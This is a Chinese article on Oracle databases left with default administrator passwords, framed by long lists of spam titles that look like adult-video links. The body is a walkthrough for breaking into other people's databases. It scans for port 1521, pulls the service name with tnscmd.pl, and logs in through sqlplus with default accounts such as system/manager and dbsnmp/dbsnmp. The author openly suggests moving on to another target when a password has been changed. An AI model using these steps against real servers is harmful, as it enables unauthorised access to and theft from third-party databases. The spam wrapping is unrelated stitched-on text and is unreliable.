国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

Oracle數據庫中存在默認密碼威脅
2009-01-03   

Oracle數據庫是現在很流行的數據庫系統,很多大型網站都采用Oracle,它之所以倍受用戶喜愛是因為它有以下突出的特點:

1、支持大數據庫、多用戶的高性能的事務處理。Oracle支持最大數據庫,其大小可到幾百千兆,可充分利用硬件設備。支持大量用戶同時在同一數據上執行各種數據應用,并使數據爭用最小,保證數據一致性。系統維護具有高的性能,Oracle每天可連續24小時工作,正常的系統操作(后備或個別計算機系統故障)不會中斷數據庫的使用。可控制數據庫數據的可用性,可在數據庫級或在子數據庫級上控制。

2、Oracle遵守數據存取語言、操作系統、用戶接口和網絡通信協議的工業標準。所以它是一個開放系統,保護了用戶的投資。美國標準化和技術研究所(NIST)對Oracle7 SERVER進行檢驗,100%地與ANSI/ISO SQL89標準的二級相兼容。

3、實施安全性控制和完整性控制。Oracle為限制各監控數據存取提供系統可靠的安全性。Oracle實施數據完整性,為可接受的數據指定標準。

4、支持分布式數據庫和分布處理。Oracle為了充分利用計算機系統和網絡,允許將處理分為數據庫服務器和客戶應用程序,所有共享的數據管理由數據庫管理系統的計算機處理,而運行數據庫應用的工作站集中于解釋和顯示數據。通過網絡連接的計算機環境,Oracle將存放在多臺計算機上的數據組合成一個邏輯數據庫,可被全部網絡用戶存取。分布式系統像集中式數據庫一樣具有透明性和數據一致性。

具有可移植性、可兼容性和可連接性。由于Oracle軟件可在許多不同的操作系統上運行,以致Oracle上所開發的應用可移植到任何操作系統,只需很少修改或不需修改。Oracle軟件同工業標準相兼容,包括很多工業標準的操作系統,所開發應用系統可在任何操作系統上運行。可連接性是指ORALCE允許不同類型的計算機和操作系統通過網絡可共享信息。

雖然Oracle數據庫具有很高的安全性,但是如果我們在配置的時候不注意安全意識,那么也是很危險的。也就是說,安全最主要的還是要靠人自己,而不能過分依賴軟件來實現。

我們知道,在mssql中,安裝完成后默認有個sa的登陸密碼為空,如果不更改就會產生安全漏洞。那么oracle呢?也有的。為了安裝和調試的方便,Oracle數據庫中的兩個具有DBA權限的用戶Sys和System的缺省密碼是manager。筆者發現很多國內網站的Oracle數據庫沒有更改這兩個用戶的密碼,其中也包括很多大型的電子商務網站, 我們就可以利用這個缺省密碼去找我們感興趣的東西。如何實現,看下面的文章吧。

進行測試前我們先來了解一些相關的知識,我們連接一個Oracle數據庫的時候,需要知道它的service_name或者是Sid值,就象mssql一樣,需要知道數據庫名。那如何去知道呢,猜?呵呵,顯然是不行的。這里我們先講講oracle的TNS listener,它位于數據庫Client和數據庫Server之間,默認監聽1521端口,這個監聽端口是可以更改的。但是如果你用一個tcp的session去連接1521端口的話,oracle將不會返回它的banner,如果你輸入一些東西的話,它甚至有可能把你踢出去。這里我們就需要用tnscmd.pl這個perl程序了,它可以查詢遠程oracle數據庫是否開啟(也就是ping了),查詢版本,以及查詢它的服務名,服務狀態和數據庫服務名,而且正確率很高。

理論方面的講完了,如果還有什么不懂的可以去查找相關資料。現在開始測試吧,需要的工具有:ActivePerl,Oracle客戶端,Superscan或者是其它掃描端口的軟件, Tnscmd.pl。

我們先用Superscan掃描開放了端口1521的主機,假設其IP是xx.xx.110.110,這樣目標已經有了。然后我們要做的就是用Tnscmd.pl來查詢遠程數據庫的服務名了,Tnscmd.pl的用法如下:

 C:\perl\bin>perl tnscmd.pl
usage: tnscmd.pl [command] -h hostname
where 'command' is something like ping, version, status, etc.
(default is ping)
[-p port] - alternate TCP port to use (default is 1521)
[--logfile logfile] - write raw packets to specified logfile
[--indent] - indent & outdent on parens
[--rawcmd command] - build your own CONNECT_DATA string
[--cmdsize bytes] - fake TNS command size (reveals packet leakage)

我們下面用的只有簡單的幾個命令,其他的命令也很好用,一起去發掘吧。

然后我們就這樣來:

 C:\perl\bin>perl tnscmd.pl services -h xx.xx.110.110 -p 1521 –indent
sending (CONNECT_DATA=(COMMAND=services)) to xx.xx.110.110:1521
writing 91 bytes
reading
._.......6.........?. ..........
DESCRIPTION=
TMP=
VSNNUM=135286784
ERR=0
SERVICES_EXIST=1
.Q........
SERVICE=
SERVICE_NAME=ORCL
INSTANCE=
INSTANCE_NAME=ORCL
NUM=1
INSTANCE_CLASS=ORACLE
HANDLER=
HANDLER_DISPLAY=DEDICATED SERVER
STA=ready
HANDLER_INFO=LOCAL SERVER
HANDLER_MAXLOAD=0
HANDLER_LOAD=0
ESTABLISHED=447278
REFUSED=0
HANDLER_ID=8CA61D1BBDA6-3F5C-E030-813DF5430227
HANDLER_NAME=DEDICATED
ADDRESS=
PROTOCOL=beq
PROGRAM=/home/oracle/bin/oracle
ENVS='ORACLE_HOME=/home/oracle,ORACLE_SID=ORCL'
ARGV0=oracleORCL
ARGS='
LOCAL=NO
'
.........@

從上面得到的信息我們可以看出數據庫的服務名為ORCL,然后我們就可以通過sqlplus工具來遠程連上它了,用戶名和密碼我們用默認的system/manager或者是sys/manager,其他的如mdsys/mdsys,ctxsys/ctxsys等,這個默認用戶和密碼是隨版本的不同而改變的。如下:

 C:\oracle\ora90\BIN>sqlplus /nolog
SQL*Plus: Release 9.0.1.0.1 - Production on Thu May 23 11:36:59 2002
(c) Copyright 2001 Oracle Corporation. All rights reserved.
SQL>connect system/manager@
(description=(address_list=(address=(protocol=tcp)
(host=xx.xx.110.110)(port=1521)))
(connect_data=(SERVICE_NAME=ORCL)));

如果密碼正確,那么就會提示connected,如果不行,再換別的默認用戶名和密碼。經過筆者的嘗試一般用dbsnmp/dbsnmp都能進去。當然如果對方已經把默認密碼改了,那我們只能換別的目標了。但是我發現很多都是不改的,這個就是安全意識的問題了。

(責任編輯:銘銘 mingming_ky@126.com TEL:(010)68476636)


熱詞搜索:

上一篇:揭秘流氓軟件盛行內幕VC為幕后推動者
下一篇:2007年網絡安全趨勢預測

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
一区二区欧美在线观看| 不卡视频免费播放| 成人av在线一区二区| 欧美午夜理伦三级在线观看| 色一区在线观看| 国产一区二区久久| 另类的小说在线视频另类成人小视频在线| 欧美日韩二区三区| 国产无人区一区二区三区| 丝袜a∨在线一区二区三区不卡| 成人精品电影在线观看| 精品免费一区二区三区| 亚洲国产欧美一区二区三区丁香婷| 国产原创一区二区三区| 日韩一区二区精品在线观看| 亚洲二区在线观看| 欧美性色欧美a在线播放| 国产精品视频在线看| 国产自产v一区二区三区c| 91精品国产入口| 一区二区三区四区精品在线视频| 成人性视频网站| 亚洲国产精品成人综合色在线婷婷 | 亚洲综合激情小说| 91亚洲国产成人精品一区二三 | 91精品在线观看入口| 亚洲曰韩产成在线| 色综合中文字幕国产 | 一区二区三区精品在线观看| 成人激情动漫在线观看| 国产日韩精品久久久| 国产麻豆成人传媒免费观看| 久久综合给合久久狠狠狠97色69| 麻豆91在线播放| 在线综合+亚洲+欧美中文字幕| 午夜精品一区二区三区三上悠亚| 一本久久综合亚洲鲁鲁五月天| 亚洲天堂2014| 日本精品视频一区二区三区| 亚洲精品日韩一| 在线观看亚洲一区| 亚瑟在线精品视频| 91精品国产aⅴ一区二区| 麻豆国产一区二区| 久久久一区二区| 成人午夜视频免费看| 综合网在线视频| 欧美日韩中文字幕一区| 蜜臀av一区二区| 国产色产综合产在线视频| 不卡的av电影| 亚洲一线二线三线视频| 日韩亚洲欧美成人一区| 国产成人鲁色资源国产91色综| 国产精品久久久久桃色tv| 色妹子一区二区| 日本网站在线观看一区二区三区| 亚洲精品一区在线观看| 91麻豆精东视频| 麻豆精品一区二区三区| 国产精品女上位| 欧美高清hd18日本| 国产成人在线网站| 一区二区三区欧美日韩| 欧美精品 国产精品| 国产成人免费网站| 亚洲地区一二三色| 久久麻豆一区二区| 欧洲激情一区二区| 国产成人精品一区二区三区四区 | 国产精品影视网| 一区二区三区波多野结衣在线观看 | 91麻豆精品国产91久久久资源速度| 国产在线精品一区二区不卡了| 中文字幕一区二区不卡| 日韩一区二区免费在线观看| 不卡一区二区三区四区| 婷婷开心激情综合| 国产精品久久久99| 精品国产露脸精彩对白| 欧美午夜精品久久久| 国产麻豆9l精品三级站| 日韩激情一二三区| 中文字幕一区二区三区精华液| 91精品在线一区二区| 色综合久久久久综合99| 国产成人在线视频网站| 美女一区二区在线观看| 亚洲伊人色欲综合网| 国产欧美日韩另类视频免费观看| 91精品免费在线| 欧美日韩在线免费视频| caoporm超碰国产精品| 国内精品不卡在线| 奇米影视一区二区三区| 亚洲一区二区三区四区在线| 国产精品久线观看视频| 国产片一区二区| 久久精品夜色噜噜亚洲aⅴ| 欧美电影免费观看高清完整版在| 欧美精品一二三四| 欧美日韩国产首页| 在线观看日韩av先锋影音电影院| 成a人片国产精品| 国产精品一品二品| 国内精品在线播放| 国产自产v一区二区三区c| 久久精品99久久久| 男人操女人的视频在线观看欧美| 午夜精品成人在线| 日本不卡123| 青青草国产成人99久久| 日本午夜精品视频在线观看| 日韩福利电影在线| 免费国产亚洲视频| 久久成人羞羞网站| 久国产精品韩国三级视频| 国内精品国产三级国产a久久| 久久99国产精品成人| 国产一区二区三区| 福利一区在线观看| 色综合视频在线观看| 欧美又粗又大又爽| 制服丝袜亚洲精品中文字幕| 精品日韩欧美一区二区| 国产欧美日韩另类一区| 亚洲日本在线a| 亚洲一区二区三区四区不卡| 日韩有码一区二区三区| 久久精品国产久精国产| 大陆成人av片| 欧美视频一区二区| 日韩一级精品视频在线观看| 久久综合九色综合97婷婷女人 | 在线观看国产一区二区| 欧美日韩精品欧美日韩精品| 日韩一区二区三区高清免费看看| 26uuu国产电影一区二区| 中文字幕在线一区二区三区| 夜色激情一区二区| 蜜臀91精品一区二区三区| 国产91精品一区二区麻豆网站| 99国产精品视频免费观看| 欧美日本不卡视频| 久久久美女毛片| 亚洲欧美日韩国产手机在线| 五月婷婷另类国产| 国产成人午夜电影网| 欧美性大战久久久久久久蜜臀| 精品入口麻豆88视频| 日韩美女久久久| 麻豆一区二区三| 91啪亚洲精品| 久久综合999| 亚洲一区二区三区美女| 久久99国产乱子伦精品免费| 91蝌蚪porny成人天涯| 欧美一区二区网站| 国产精品成人一区二区艾草| 日本伊人精品一区二区三区观看方式| 国产成人免费xxxxxxxx| 在线成人午夜影院| 1000部国产精品成人观看| 免费成人你懂的| 色综合天天综合色综合av | 欧美一区二区三区喷汁尤物| 国产欧美综合在线观看第十页| 亚洲va欧美va天堂v国产综合| 国产精品123| 91麻豆精品国产91久久久久久久久| 国产精品网站一区| 精品一区二区三区视频 | 婷婷中文字幕一区三区| 成人91在线观看| 久久久久国产精品人| 奇米色一区二区| 欧美视频一区二区三区| 亚洲欧美视频一区| 国产乱码精品一品二品| 精品国产亚洲在线| 麻豆成人91精品二区三区| 欧美午夜宅男影院| 亚洲精品成人天堂一二三| 岛国精品在线播放| 久久婷婷久久一区二区三区| 麻豆成人综合网| 欧美成人a∨高清免费观看| 日日夜夜精品免费视频| 欧美性大战久久久久久久蜜臀| 国产精品国产三级国产aⅴ原创| 国产成人日日夜夜| 日本一区免费视频| 国产精品资源站在线| 2024国产精品| 国产一区二区精品在线观看| 久久综合久久综合久久| 国产精品资源网站| 国产拍欧美日韩视频二区| 高清免费成人av| 中文字幕亚洲区|